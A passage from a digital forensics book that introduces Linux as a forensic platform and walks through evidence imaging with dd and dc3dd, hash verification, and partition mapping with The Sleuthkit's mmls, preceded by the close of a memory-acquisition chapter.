There is no single version of Linux; every distribution has its own intricacies and (minor) differences. A tool was therefore needed that can perform a memory dump independent of installed kernels, packages, or other dependencies. Microsoft actively develops AVML²¹⁴, which fits this bill and has a few tricks of its own: it supports compression of memory dumps to decrease the amount of required disk space, as well as uploads to a Microsoft Azure Blob store.

²¹³https://github.com/thimbleweed/All-In-USB/tree/master/utilities/DumpIt
²¹⁴https://github.com/microsoft/avml
The standard usage of AVML is shown below:

avml output.lime

It is possible to generate a compressed image with the following command:

avml --compress output.lime.compressed

For a full set of commands, please refer to the GitHub development page.

Virtual Machines

The prevalent use of virtual machines impacts memory acquisition as well, with its own advantages and disadvantages. One advantage is that memory collection has become easier: a virtual machine hypervisor allows a virtual machine to be suspended, effectively hitting the pause button and freezing all activity. During this process the contents of the RAM are written to disk, so no additional tools are necessary to perform an acquisition. The resulting files from popular vendors like VMware and VirtualBox can be analyzed by memory analysis tools like Volatility.
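As a hedged sketch (file name hypothetical), a VMware .vmem file produced by suspending a guest can typically be fed straight into Volatility 3 without conversion:

python3 vol.py -f suspended.vmem windows.pslist

Depending on the questions at hand, the same image can be run through other plugins, such as windows.netscan for network connections.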
Next Steps and Conclusion

This chapter was designed to hit the ground running and assist a forensicator with imaging a desktop or server. What comes next in the investigation depends entirely on the research questions and the associated context of the case itself. One final tip this chapter can provide is to focus on triage first and foremost. SANS has developed a poster for this specific scenario as part of its FOR500 and FOR508 courseware. It can be found at https://www.sans.org/posters/windows-forensic-analysis/. For tips on scaling triage, check out Chapter 11 of this book, written by the same author.
Chapter 10 - Linux and Digital Forensics

By Barry Grundy²¹⁵ | Website²¹⁶ | Discord²¹⁷

What is Linux?

There are plenty of resources available on what Linux is, what roles it fills, and how it compares with other operating systems. Here we will discuss Linux from the perspective of digital forensics and incident response.

There have been many discussions about what defines Linux. The classical definition is that Linux is a kernel (the "brains" of the operating system) augmented by user-space drivers, utilities, and applications that allow us to interact with a computer in a useful manner. For the sake of simplicity, we extend the name "Linux" to encompass the entire operating system and even the applications that are bundled and distributed with it.

Linux was developed by Linus Torvalds at the University of Helsinki in the early 1990s. It was, essentially, a "hobby" version of UNIX created for PC hardware.

²¹⁵https://github.com/bgrundy
²¹⁶https://linuxleo.com
²¹⁷http://discordapp.com/users/505057526421913600
On 25 August 1991, Torvalds posted this to the Usenet group comp.os.minix:

Hello everybody out there using minix

I'm doing a (free) operating system (just a hobby, won't be big and professional like gnu) for 386(486) AT clones. This has been brewing since april, and is starting to get ready. I'd like any feedback on things people like/dislike in minix, as my OS resembles it somewhat (same physical layout of the file-system (due to practical reasons) among other things).

I've currently ported bash(1.08) and gcc(1.40), and things seem to work. This implies that I'll get something practical within a few months, and I'd like to know what features most people would want. Any suggestions are welcome, but I won't promise I'll implement them :-)

Linus ([email protected])

PS. Yes - it's free of any minix code, and it has a multi-threaded fs. It is NOT portable (uses 386 task switching etc), and it probably never will support anything other than AT-harddisks, as that's all I have :-(.

–Linus Torvalds (quoted from Wikipedia²¹⁸)

Modern Linux is an operating system very similar to Unix, deriving most of its functionality from the much older AT&T Unix originally developed in the 1970s. This includes a full TCP/IP stack and GNU development tools to compile programs. In short, Linux is mostly compliant with the Portable Operating System Interface for Unix (POSIX). Despite the lack of architecture portability and the limited hardware support mentioned in Torvalds's postscript, Linux has grown into a fully functioning operating system that supports a great deal of modern hardware. Standard SATA hard drives through modern M.2 and NVMe storage are robustly supported. Drivers and software support for newer motherboards and associated hardware are constantly improving and growing. The Linux kernel, where most of this support resides, has a very fast production cycle, and support for newer devices (where specifications are available) is added rapidly in most cases.

For the digital forensics practitioner, this hardware compatibility can be exceedingly important. Not only must we verify and test that our own hardware is properly supported and functioning as intended; we also need to ensure that any subject hardware we might attach directly to our system (which we might do for a variety of reasons) is properly detected and supported. This is often done via a direct physical connection, or via boot media on a subject system.

While we have given a very general definition of what Linux is and where it originated, we should also mention what Linux is not, particularly where digital forensics is concerned. We will cover why you might want to use Linux for digital forensics in a later section, but for now, a beginner forensics

²¹⁸https://en.wikipedia.org/wiki/History_of_Linux#The_creation_of_Linux
examiner should know that Linux is not a platform well suited to "point-and-click", or what some might refer to as "Nintendo forensics", techniques. While there are graphical user interface (GUI) tools available for Linux, it is not the strongest OS for that approach. More on that later.

Linux can be fairly easy to install, particularly given modern desktop GUI front ends for configuration and settings. However, Linux is NOT a "better Windows". Linux should not be approached as a replacement for Microsoft Windows, one that acts like Windows and is supposed to feel familiar to someone who has been using Windows (or macOS for that matter) for years. Linux works very differently from more mainstream operating systems. There is a steep learning curve, and troubleshooting can seem overwhelming to someone used to running Windows on their computer. It is possible to use Linux as a primary driver for digital forensics, and many digital forensic practitioners have done so for years. That said, while Linux can be a fantastic learning tool and a great way to access forensic and operating system utilities on an alternative platform, it will remain a secondary operating system for most people new to the field.

Now that we have a very basic idea of what Linux is and is not, let's discuss why we might decide to add it to our digital forensic toolbox.

Why Linux for Digital Forensics

There are any number of reasons for choosing to learn and run Linux as a digital forensics platform. We will cover the more important ones here.

Education

If you are a student of digital forensics or a practitioner looking to better understand a particular forensic process, Linux provides an excellent environment for learning. Particularly for students, the sheer number of free tools available for Linux, not to mention the standard operating system utilities, makes it accessible at all levels of income. There is no need for expensive licenses or dongles to do a full analysis or participate in training. While it is true that many open source digital forensics utilities will compile and run natively on Windows, the ability to run multiple copies of Linux, either on physical computers or in virtual machines, still makes it an attractive alternative for learning.

Many of the tools available for digital forensics on Linux are meant to be used from the command line interface (CLI). To a beginner this can certainly appear daunting, but learning at the CLI removes the clutter of a GUI and all the menus and mouse clicks required to complete a task. Most Unix tools adhere to the philosophy that a tool should do one thing and do it well. As you learn what each tool does and how it works, you can string commands together to accomplish a whole series of steps in one command line using multiple tools at once (commonly referred to as piping, sketched below). This approach allows you to concentrate on the results rather than on an interface with multiple windows and views to sort through. Again, this is a benefit for education specifically. There is no doubt that a forensic software suite that ingests and analyzes evidence and presents the results in a single step is more efficient. But learning from the CLI with specific and very targeted output can be immensely powerful for students.
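As a small, hedged illustration of piping (the image name and partition offset are hypothetical), the following one-liner lists every file in an NTFS volume with The Sleuthkit's fls, filters the listing down to PDF documents with grep, and sorts the result:

$ fls -r -o 2048 -f ntfs image.raw | grep -i "\.pdf" | sort

Each tool does one job, and the pipe character (|) hands the output of one to the next.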
Free(dom)!

Freedom and flexibility are just two of the many attributes that can make Linux a useful addition to a forensic examiner's toolbox. First and foremost, of course, Linux is free. As mentioned earlier, this means we can install it as many times and on as many computers (or virtual machines) as we like. You can use it as any sort of server without tying up valuable budget resources on licensing. This goes for the forensic software as well: you can install, copy, and share across multiple platforms and users, again without breaking the bank. For a practitioner learning the ins and outs of digital forensics, this can be very powerful. You can install multiple copies of Linux across devices and virtual environments in a simple home lab, deleting, reinstalling, and repurposing computer resources along the way. Installing and running Linux is a great way to repurpose old hardware, which brings us to our next point.

Linux provides unparalleled flexibility. It will run on all forms of hardware, from laptop and desktop computers to mobile devices and single-board computers (SBCs). It will run in a variety of virtualization environments, up to and including Microsoft Windows's own Windows Subsystem for Linux (WSL/WSL2). You can choose to run a Linux distribution on a workstation, on a $50 Raspberry Pi, in a virtual machine, or natively in Windows using WSL. These all have their benefits and drawbacks, including cost, direct hardware access, convenience, and resource requirements.

Another facet of Linux's flexibility lies in the number of freely available choices users have over their working environment. Desktop environments like KDE/Plasma²¹⁹, GNOME²²⁰ and XFCE²²¹ provide a wide range of options that a user can customize for aesthetics or workflow efficiency. These desktop environments don't change the underlying operating system, only the way one interacts with that system. Paired with a separate window manager, there are hundreds of possibilities for customization.

While this may sound trivial, we are not discussing wallpaper and icon themes here; we are talking about the flexibility to decide exactly how you interact with your workstation. For example, you can set up a Linux environment that focuses primarily on CLI usage, where the keyboard is the primary interface and the mouse is rarely needed. This can be done with a wide selection of "tiling" window managers that open new windows in a pre-determined arrangement and allow window manipulation, multiple workspaces, and program access entirely through customizable keystrokes, with little or no use for a mouse. This is certainly not a configuration that will appeal to everyone, but that is one of the joys of Linux: the ability to completely customize it to match your particular workflow.

²¹⁹https://kde.org/plasma-desktop/
²²⁰https://www.gnome.org/
²²¹https://www.xfce.org/
Control

Another traditional benefit of Linux over other operating systems has historically been the control it provides over attached devices. This has always been one of the more important factors in adopting Linux for a forensic workstation. Most operating systems are designed to isolate the user from the inner workings of hardware. Linux, on the other hand, has traditionally allowed much more granular control over attached devices and the associated drivers. This has blurred somewhat in recent years, with a number of popular Linux versions becoming more desktop-oriented and relying more and more on automation and ease of operation. While this approach does hide some of the control options from the user, they are generally still available. Again, with advances in recent years, this level of hardware control is not as exclusive to Linux as it once was.

Cross verification - An Alternate OS Approach

All of the preceding might come across as pushing Linux as a superior operating system for digital forensics. That is most certainly not the intention. Rather, an effort has been made to point out the strengths of Linux in comparison to other platforms. In reality, having Linux in your digital forensics arsenal simply means having access to a particularly powerful alternative tool. It is absolutely possible to utilize Linux as a primary digital forensic platform in today's laboratory environment. It is also a reality that providing timely and usable information to non-technical investigators and managers often means utilizing the reporting and data-sharing functionality of modern forensic software suites, which most often run under mainstream operating systems and not Linux.

So where does Linux fit into a modern laboratory where reality and caseload dictate the use of software suites with automated functionality? As an alternative operating system, Linux is often used to troubleshoot hardware issues where one platform either cannot detect or cannot access particular media. Linux is well known for its ability to provide better diagnostic information and sometimes better detection for damaged or otherwise misbehaving devices. When dealing with difficulties accessing a hard drive, for example, you will often hear the advice "connect it to a Linux box". Being able to directly monitor the kernel buffer and view the interactions between hardware and the kernel can be a great help in solving hardware issues.

There is also the benefit of having a completely different operating system utilizing a different toolset for cross-verification of findings. In some organizations, cross-verification of significant analysis results is a requirement. Depending on the situation, validating a result can make good sense even when it is not explicitly required. Cross verification means that if a practitioner finds an artifact or draws a particular conclusion on a given piece of evidence, the finding can be reproduced using a different tool or technique.
Consider the following simplified example:

1. A forensic examiner extracts user-created content (documents, emails, etc.) from computer media and provides the data to an investigator using a common Windows forensic software suite.
2. The investigator identifies a particular document of value to the case being investigated and requests a report specific to that document.
3. The forensic examiner provides a targeted report detailing the document's properties: timestamps, ownership, where or how it might have originated on the media, and so on.
4. The forensic examiner re-analyzes the specific document using a completely different tool, perhaps on a completely different operating system (Linux in this case). Does the alternate tool identify the same physical disk location? Are the timestamps the same? Is the document metadata the same? Differences, if any, are investigated and explained.

The cross verification outlined above is somewhat simplified, but it provides an outline of how Linux can be employed in a laboratory environment dominated by Windows software and the need for efficient reporting. Using an alternative operating system and unique open source tools to cross-verify specific findings can help eliminate concerns about automated processes and the integrity of reports. Another benefit of using Linux to cross-verify findings is that you will learn the OS as you integrate it into your workflow, rather than simply installing it and trying to make time to learn.
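As a brief, hedged sketch of what step 4 might look like with The Sleuthkit (the partition offset and MFT entry number are hypothetical), istat prints the entry's attributes and timestamps for side-by-side comparison with the Windows suite's report, while hashing the icat output confirms that both tools recovered identical content:

$ istat -o 2048 -f ntfs image.raw 1542
$ icat -o 2048 -f ntfs image.raw 1542 | sha1sum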
Choosing Linux

How does one start a journey into using Linux for digital forensics? We begin with a discussion of distributions and selecting your platform's "flavor" of Linux.

Distributions

A Linux distribution (or "distro" for short) is a collection of Linux components and compiled open-source programs bundled together to create an operating system. These components can include a customized and packaged kernel, optional operating system utilities and configurations, custom-configured desktop environments and window managers, and software management utilities. These are all tied together with an installer that is usually specific to the given distribution. Because of the open-source nature of the Linux environment, you could grab the source code for the various components and build your very own distribution, or at least a running version of Linux. This is often referred to as "Linux from Scratch" (LFS). With a distribution, the developers do all the heavy lifting for you: they package it all up and make the entire operating system available for installation via a variety of methods.

Some popular distributions include, but are certainly not limited to:

• Ubuntu²²²
• Manjaro²²³
• Arch²²⁴
• Mint²²⁵
• SUSE²²⁶
• Red Hat²²⁷
• Slackware²²⁸
• and many others

So how does one choose a Linux distro, particularly for use as a digital forensics platform?

Choosing Your Platform

From the perspective of a digital forensics examiner, any distro will work within reason. The simplest answer is to download any popular distribution and just install it. In the long run, just about any flavor of Linux can be made to act and "feel" like any other. If you want to do some research first, consider looking at what is already in use. Does your lab or agency already use Linux in the enterprise? It may be a good idea to use a Linux version that closely matches what your organization has already deployed. If part of your job is to respond to company or agency incidents, a more intimate knowledge of the systems involved will be helpful. Another legitimate answer to the question of "which distro?" is simply to see what others around you are running. If you have co-workers or labmates who run a specific version of Linux, it makes sense to do the same; being able to consult with co-workers and friends makes getting support much easier.

There are, however, other points that might warrant scrutiny. Ubuntu, as popular as it is, has drifted toward a more desktop-oriented operating system. Configuration options and system settings have been made much easier through a number of GUI utilities and enhancements that make the distribution more focused on ease of use. The end user still has access to in-depth control of the operating system, but there might be some work involved in disabling some of the automation that can hamper forensic work (automatic mounting of attached storage, for example).

Other Linux distributions offer a far simpler approach: minimally configured "out of the box", leaving it entirely up to the user to configure the bells and whistles often considered standard features of modern operating systems. Distributions like Slackware, Void Linux, and Gentoo fall into

²²²https://ubuntu.com/
²²³https://manjaro.org/
²²⁴https://archlinux.org/
²²⁵https://linuxmint.com/
²²⁶https://www.suse.com/
²²⁷https://www.redhat.com/en
²²⁸http://www.slackware.com/
this category. With these distributions, rather than undoing systemic changes made for a heavily desktop-oriented configuration, you can start with a more streamlined workstation and build up, creating a more efficient system. The learning curve, however, is steeper.

Another consideration is the choice between a rolling-release and an incremental-release distro. Most operating systems are released in discrete, numbered versions: version X is released on a given date and typically receives only security updates and bug fixes until the next major version, Y, is made available, and so on. Distributions like Slackware, Debian, and (generally) Ubuntu fall into this category. For the most part, this release schedule is more stable, because components of the desktop and operating system are updated and tested together before release. For the forensic examiner, this approach introduces fewer mass changes to kernel components and software libraries that might affect the forensic environment or impact evidence integrity and the interpretation of examination results.

A rolling release, on the other hand, continually updates software as new versions become available, for everything from the kernel to base libraries. This has the benefit of always keeping up with the "latest and greatest": changes to upstream software are often immediately supported, though the overall experience may be slightly less stable and polished. One obvious downside to choosing a rolling distro is that wholesale changes to the operating system should trigger validation testing by the forensic examiner. There should be no doubt that a digital forensics platform is operating exactly as expected, and constant mass upgrades can interfere with this by breaking or changing expected outputs or hardware behavior. Examples of rolling-release distros include Arch, Manjaro, Void, and Ubuntu Rolling Rhino.

There are also ready-made distributions designed specifically for digital forensics; Kali Linux, Caine, and Tsurugi Linux are common examples. These are generally used as bootable operating systems for live investigations, but they can also be installed directly on hardware for lab use. These systems come ready to go with just about all the forensic software one might need to conduct digital forensics, incident response, or even Open Source Intelligence (OSINT) work. From an education perspective, ready-made forensic distributions have you up and running quickly, ready to learn the tools. What you miss, however, is actually setting up, finding, and installing the tools yourself, all of which is part of the educational process.

If there are no organizational considerations, then consider using a popular distribution with wide acceptance in the community. Ubuntu is the first distribution that comes to mind here. Much of the forensic software available today for Linux is developed and tested on Ubuntu, and there is a huge support community, so most questions that arise already have easily accessible answers. While the same can be said for other distributions (Arch Linux comes to mind), Ubuntu is certainly the most ubiquitous. If you choose to chart your own course and use a distribution along the lines of Slackware or Gentoo, you will start with a very "vanilla" installation. From there, you will learn the ins and outs of configuration, system setup, and administration without a lot of helpful automation.
Customization options are abundant and left almost entirely up to the user. It may be helpful to create a virtual machine snapshot with the setup you come to prefer. That way,
a fresh copy can be deployed any time you need one without a lot of tedious prep.
Learning Linux Forensics

There are copious resources available for Linux learners, from distribution-specific tutorials and wiki pages to command-line-oriented blogs and websites. You can take an online course from Udemy, edX, or even YouTube, and numerous presses publish dozens of books every year. The digital forensics niche in Linux is no exception, though you may have to dig a bit for the specific resources you need. Whether you are interested in "Linux forensics" in the sense of using Linux as your forensic platform, or in digital forensics performed on Linux systems, there is no shortage of material for the motivated student.

Linux as a Platform

Most of what we have covered so far assumes an interest in choosing and installing Linux for use as a platform to perform forensics, either as a primary operating system or as an adjunct for cross verification. To use Linux this way, we first learn the operating system itself: installation, configuration, the network environment, and the interface. This is common to all users, whether or not the system will be used for digital forensics. We, however, must consider in particular whether there are any "out-of-the-box" configurations or automations that interfere with evidence collection or integrity.

Second, there are the tools we need to learn. These fall into a number of categories:

• Evidence acquisition
• Volume analysis
• File system analysis
• Application analysis
• Memory analysis
• Network enumeration and analysis
• Data parsing

There are specific tools (with some crossover) for each of these categories, which we'll cover in the next sections.

The Law Enforcement and Forensic Examiner's Introduction to Linux, the LinuxLEO guide²²⁹, is available for free. Written by the same author as this chapter, the guide was produced as a complete guide for beginners. It covers installing Linux, learning the operating system, and using forensic tools to conduct hands-on exercises with sample practice files. The materials are freely available at https://www.linuxleo.com.

²²⁹https://www.linuxleo.com
Linux as a Target

Perhaps you have no specific desire to use Linux as a day-to-day forensic platform. There is, however, something to be said for knowing how Linux works and where to look for evidence should you be assigned an analysis where the subject device runs a version of Linux. For years now, Linux has been a popular server operating system, utilized in enterprise environments across the world. In the past few years, there has been steady growth in "desktop" Linux, particularly with the emergence of user-oriented distributions like Ubuntu, Mint, and derivatives based on them. Growth in Linux-compatible software for specialized tasks such as video editing, publishing, and even gaming has resulted in Linux being more widely adopted. While the platform has always been well represented in academia, the proliferation of Linux desktop applications has produced a much wider user base.

Given the popularity of the Android operating system, which is (in simple terms) based on Linux, there has long been a strong need for familiarity with Linux in the analysis of mobile devices. Note, however, that Android is not the same as the Linux we find on desktop computers. They are similar, to be sure, but their file system structures and application analysis are widely divergent.

One of the biggest issues that arises when examining a Linux system is the breadth of options available to a user on a customized desktop or server. For example, an examiner must be at least somewhat familiar with a subject computer's init system. Most modern distributions use systemd to control processes and logging; other distributions rely on the older text-based BSD init or System V process scripts. In either case, and depending on the nature of the investigation, knowing how processes are started and stopped might be an important part of the forensic puzzle.

Tracking and identifying user activity is often another important piece of the puzzle. With Linux, regardless of distribution, users have a wide range of choices for desktop environments, window managers, file managers, and many other desktop components. All of these components, some used in combination, store configuration and user activity in different formats and locations, which makes having intimate knowledge of every possible iteration very difficult.

Even the very low-level components of a Linux installation can differ, even within a single distribution. Users can choose a different bootloader (which loads the operating system) or a different file system format for various partitions. Most Linux distributions use the Ext4 file system by default, but it is a simple matter to select and install any number of others depending on preference and use case: Btrfs, XFS, ZFS, and JFS are all file systems you might encounter. Should an examiner come across one of these, consideration would need to be given to file recovery, allocation strategies that help determine file activity, and forensic software support.

All of these are challenges when examining any of the myriad permutations of Linux. There are a few books covering the basics of Linux examinations, and much of the information available from a forensic perspective can also be found in videos and seminars. For anyone looking for a challenging focus for research or a subject for an academic project, Linux as a forensic target provides ample subject matter for unique content.
Linux Forensics in Action

The information covered so far gives an overview of Linux and where it might fit into a digital forensic workflow. For those just starting out, or for those who have never seen Linux in action before, it might be useful to actually see a very simple command line session from acquisition through artifact recovery and interpretation. First, let's map out a quick outline of what we wish to accomplish and the tools we will use:

1. Define the goal of the examination (scope)
2. Acquire the evidence (imaging)
3. Verify evidence integrity
4. Map the forensic image and find a volume of interest
5. Identify the file system format within that volume
6. Identify artifacts (e.g., files) of interest
7. Extract and examine the artifacts
8. Parse data from each artifact
The Tools

There are far too many tools to cover in a single chapter. Again, documents like the previously mentioned LinuxLEO guide²³⁰ cover a great number of tools with hands-on opportunities. Here we will select just a few tools to do a quick analysis of a Microsoft Windows Registry file.

Purpose Tool(s)
Acquisition dd, dc3dd, dcfldd, ddrescue, ewfacquire
Integrity verification (hashing) md5sum, sha1sum, sha256sum, etc.
Volume / file system / file analysis The Sleuthkit (TSK): mmls, fsstat, fls, istat, icat, blkcalc, etc.
Windows artifacts Libyal (multiple tools/libraries): libregf, libevtx, liblnk, libscca, libesedb, etc.
File carving scalpel, foremost, bulk_extractor
Data parsing General GNU utilities: sed, awk, grep, etc.

²³⁰https://linuxleo.com
Acquisition Tools

The acquisition tools in the table above work in generally the same manner, creating "bit-for-bit" or raw images that are exact duplicates of the storage media being imaged. dd is the original Linux tool used for basic forensic imaging. It was not explicitly designed for that purpose, but it is useful in a pinch, particularly because it is available on just about any Unix or Linux system you might come across. Variants of dd include dc3dd and dcfldd. These are both forks of dd coded specifically with digital forensics and media acquisition in mind. Both include logging and built-in hashing capabilities with multiple available hash algorithms, along with options to split the output files directly for easier handling.

Command line imaging tools like dd and those based on it can seem a bit confusing at first, but they all follow the same basic command layout. In simplest terms, you have an input file defined by if=/dev/<device>. This is our subject media: the media we are imaging and will eventually examine. The output file, the image file we are writing to, is defined with of=<imagefile>. The file name is arbitrary, but the general convention is to use a .dd or .raw extension for images created with dd.

The forensic-specific versions of dd extend these options. Using dc3dd as an example, the output file can be defined with hof=<imagefile> hash=<algorithm> to hash both the input media and the resulting image. An examiner can also split the output into smaller segments using ofs=<imagefile> ofsz=<size>. Combining the options gives a split image with all the segments and the original media hashed, using hofs=<imagefile> hash=<algorithm> ofsz=<size>. The entire run can be documented with the log=<logfile> option. We will see an example of this in the scenario in the next section. Learning how to image with Linux command line tools is a useful skill for all digital forensic practitioners, and using Linux bootable media to access in-situ media is not uncommon.
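As a hedged illustration of those options combined (device and file names hypothetical; dc3dd expects the split output name to end in a numeric extension):

sudo dc3dd if=/dev/sdb hofs=image.000 ofsz=2G hash=sha256 log=image.log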
Evidence Integrity

In general, command line collection of a forensic image should include calculation of a hash of the original media prior to imaging, usually followed by a hash of the resulting forensic image. In recent years, industry practitioners have taken to relying on the built-in hashing capabilities of their imaging tools to do the work for them, but manual hashing is both a good idea and a good skill to have. The algorithm you select (MD5, SHA1, etc.) will be determined by your organization's policies and the standards you are working under; issues surrounding hash algorithm selection are outside the scope of this chapter.

Manually hashing media and files under Linux (or other command line environments, for that matter) is quite simple:

$ sudo sha1sum /dev/sdb
8f37a4c0112ebe7375352413ff387309b80a2ddd  /dev/sdb

where /dev/sdb is the subject storage media. With the hash of the original media recorded, we can use dd to create a simple raw image:

$ sudo dd if=/dev/sdb of=imagefile.raw

Now hash the resulting image file and make sure the hash matches that of the original media (/dev/sdb). A match means our image file is an exact duplicate, bit for bit, of the original:

$ sha1sum imagefile.raw
8f37a4c0112ebe7375352413ff387309b80a2ddd  imagefile.raw
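When imaging many devices, the comparison itself can be scripted. A minimal sketch, with device and file names illustrative:

$ h1=$(sudo sha1sum /dev/sdb | awk '{print $1}')    # hash of the original media
$ h2=$(sha1sum imagefile.raw | awk '{print $1}')    # hash of the image file
$ [ "$h1" = "$h2" ] && echo "hashes match" || echo "HASH MISMATCH"
hashes match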
Volume / File System Analysis

Once we have an image and the integrity of our evidence has been verified, we need to focus our examination on the volume, file system, and artifacts pertinent to our case. This includes parsing any partition table (DOS or GPT in most cases), identifying the file system format (exFAT, NTFS, APFS, etc.), and finally identifying the files or objects that need to be recovered, extracted, or examined for the investigation.

The Sleuthkit (TSK)²³¹ is a collection of command line tools and libraries that provides this functionality under Linux. Bootable distributions focused on digital forensics, like Kali and Caine, come with TSK by default, and it can also be used on Windows and Mac systems. For a quick peek into an image file it can be quite useful - there is no need to fire up a full GUI tool just to extract a file or view the contents of a directory.

The Sleuthkit supports the following file system types:

• ntfs (NTFS)
• fat (FAT (Auto Detection))
• ext (ExtX (Auto Detection))
• iso9660 (ISO9660 CD)
• hfs (HFS+ (Auto Detection))
• yaffs2 (YAFFS2)
• apfs (APFS)
• ufs (UFS (Auto Detection))
• raw (Raw Data)
• swap (Swap Space)
• fat12 (FAT12)
• fat16 (FAT16)
• fat32 (FAT32)
• exfat (exFAT)
• ext2 (Ext2)
• ext3 (Ext3)
• ext4 (Ext4)
• ufs1 (UFS1)
• ufs2 (UFS2)
• hfsp (HFS+)
• hfsl (HFS (Legacy))

²³¹https://sleuthkit.org/
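If memory of the flag serves (worth verifying against your installed build), the TSK tools will print this list themselves when passed list as the file system type:

$ fsstat -f list
Supported file system types:
        ntfs (NTFS)
        fat (FAT (Auto Detection))
        ...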
There are more than thirty command line tools in TSK. We will use some of them in the sample scenario that follows this section:

Tool     Purpose
mmls     list partitions
fsstat   file system information
fls      list files
istat    file metadata information (MFT entry, inode, etc.)
icat     recover file content

Again, for a more detailed look at The Sleuthkit, refer to the LinuxLEO guide²³² for hands-on exercises and practice images.

Artifact Analysis

Digital forensics is far more than just recovering deleted files. There are databases to parse, temporal data to extract and organize, and other artifacts to review and make sense of. Operating system changes, application version changes, and various format changes make keeping our knowledge up to date a challenging prospect. Luckily, there are a great many open source projects that specifically address the collection and analysis of everything from macOS plists to Windows shellbags. Using them might not be as simple as clicking a line item in a GUI forensic suite or selecting a specific view in a menu, but open source tools very often provide a simple command line interface and an uncluttered look at the data we need most. In addition, many of these tools provide libraries that allow developers to include artifact parsing capabilities in more feature-rich tools. One example of this is Autopsy, a GUI digital forensic tool that utilizes Sleuthkit libraries to parse disk images, storage volumes, and file systems, with additional functionality provided by external open source libraries for artifact parsing and timeline creation.

For those examiners who are proficient in the Python language, there are often specific Python libraries that can be used to parse artifacts. In some cases, the previously mentioned open source libraries include bindings that provide Python code allowing us to write scripts to parse artifacts of interest. One example of this is the libewf²³³ project. This library provides access to Expert Witness Format (EWF) images created by many acquisition utilities. The project includes tools like ewfacquire, ewfmount, and ewfinfo to acquire and directly interact with common .E01 images. In addition to the tools, there are also libraries that can be included in other programs to provide access to EWF images. The Sleuthkit can be compiled with libewf support, allowing TSK tools to be used directly on .E01 images without first having to convert them to raw format. Finally, pyewf Python bindings are provided to allow anyone to create scripts using libewf functionality.

²³²https://linuxleo.com
²³³https://github.com/libyal/libewf
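As a rough sketch of that E01 workflow (file names are illustrative; ewfmount exposes the decoded image as a virtual raw file, commonly named ewf1):

$ ewfinfo evidence.E01          # display acquisition and media metadata
$ mkdir ewf
$ ewfmount evidence.E01 ewf/    # present a raw view of the image at ewf/ewf1
$ mmls ewf/ewf1                 # TSK tools can now read it like a raw image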
For operating system artifacts, this same approach is found in other libraries like libevtx²³⁴ for Windows event logs, libregf²³⁵ for Windows registry hives, libscca²³⁶ for Windows prefetch files, and many others. These are all part of the libyal²³⁷ project. They are not the only application-level artifact tools and libraries out there, but they give an idea of what is available.

Tools on the Linux command line are, of course, not limited to computer storage media either. There are libraries and tools for mobile device analysis as well, such as libimobiledevice²³⁸ for iOS devices. Application data from mobile devices is often stored in SQLite database files, and the command line database programs included with many Linux distributions can often extract the desired data from chat apps, location-based artifacts, and more.

²³⁴https://github.com/libyal/libevtx
²³⁵https://github.com/libyal/libregf
²³⁶https://github.com/libyal/libscca
²³⁷https://github.com/libyal
²³⁸https://libimobiledevice.org/
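For example, a chat database pulled from a mobile extraction could be examined with the sqlite3 command line shell. This is only a sketch: the file, table, and column names (chat.db, messages, sender, body, sent_utc) are hypothetical and will differ from app to app:

$ sqlite3 -header -csv chat.db \
    "SELECT sender, body, datetime(sent_utc, 'unixepoch') AS sent
     FROM messages ORDER BY sent_utc;"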
So what does all this look like in use?

Sample Scenario: Define the Goal of the Examination

An important part of every digital forensic analysis is defining the goal, or at least the scope, of your examination. Focusing on a goal helps us identify the tools required and the methods we should use. When we provide forensic support to other investigators, the goal of the examination is typically defined by the support request. In other cases, the elements of the crime or known indicators (in the case of a network compromise) provide the goals.

In this particular exercise, we will go back to our premise of cross verification. Covering every step in exact detail is outside the scope of this chapter; this is an illustration of what a simple cross-verification of results might look like. Let us assume we have the output of a Windows forensic suite showing a particular user's last login to a Windows workstation at a given time. This was done through the examination of the Security Account Manager (SAM) registry file. The specific time the user logged in is imperative to the case, and we want to cross-verify the results. Our original output shows this:

Username        : johnnyFox [1000]
Full Name       :
User Comment    :
Account Type    : Default Admin User
Account Created : Thu Apr  6 01:35:32 2017 Z
Name            :
Password Hint   : InitialsInCapsCountToFour
Last Login Date : Sun Apr 30 21:23:09 2017 Z
Pwd Reset Date  : Thu Apr  6 01:35:34 2017 Z
Pwd Fail Date   : Sun Apr 30 21:23:01 2017 Z
Login Count     : 7

The goal of this examination is to verify the above Last Login Date with a separate tool under Linux (our cross verification).
Sample Scenario: Acquire the Evidence

In this scenario, we can assume the evidence has already been acquired. But for the sake of illustration, we will show the disk image being created from computer media attached to our Linux platform. Linux assigns a device node to attached media; in this case, the device node is /dev/sdb. The command lsblk will list all the block devices (storage media) attached to our system:

$ lsblk
NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINTS
...
sdb      7:0    0  500M  1 disk
└─sdb1 259:4    0  499M  1 part
...

Once we've identified the device, we can image it with dd or, preferably, a more forensics-oriented variant like dc3dd:

$ sudo dc3dd if=/dev/sdb hof=image.raw hash=sha1 log=image.log

This is a simple forensic image obtained with Linux using dc3dd on a subject disk. The input file (if) is /dev/sdb. The hashed output file (hof) is image.raw. The hash algorithm is SHA1, and we are writing a log file to image.log. The log file created above is viewable using the cat command to stream the text file to our terminal:

$ cat image.log

dc3dd 7.2.646 started at 2022-07-27 21:33:40 -0400
compiled options:
command line: dc3dd if=/dev/sdb hof=image.raw hash=sha1 log=image.log
device size: 1024000 sectors (probed),      524,288,000 bytes
sector size: 512 bytes (probed)
   524288000 bytes ( 500 M ) copied ( 100% ),    2 s, 237 M/s
   524288000 bytes ( 500 M ) hashed ( 100% ),    1 s, 555 M/s

input results for device `/dev/sdb':
   1024000 sectors in
   0 bad sectors replaced by zeros
   094123df4792b18a1f0f64f1e2fc609028695f85 (sha1)

output results for file `image.raw':
   1024000 sectors out
   [ok] 094123df4792b18a1f0f64f1e2fc609028695f85 (sha1)

dc3dd completed at 2022-07-27 21:33:42 -0400

This shows us a log of the imaging process, the size of the data acquired, and the calculated hashes that help document evidence integrity. We now have a verified image, obtained from the original storage device, that we can use for our examination.
Sample Scenario: Map the Storage Volumes

Once we have created our image, we need to determine the partitioning scheme and which of those partitions are of interest to our investigation.

$ mmls image.raw
DOS Partition Table
Offset Sector: 0
Units are in 512-byte sectors

      Slot      Start        End          Length       Description
000:  Meta      0000000000   0000000000   0000000001   Primary Table (#0)
001:  -------   0000000000   0000002047   0000002048   Unallocated
002:  000:000   0000002048   0001023999   0001021952   NTFS / exFAT (0x07)

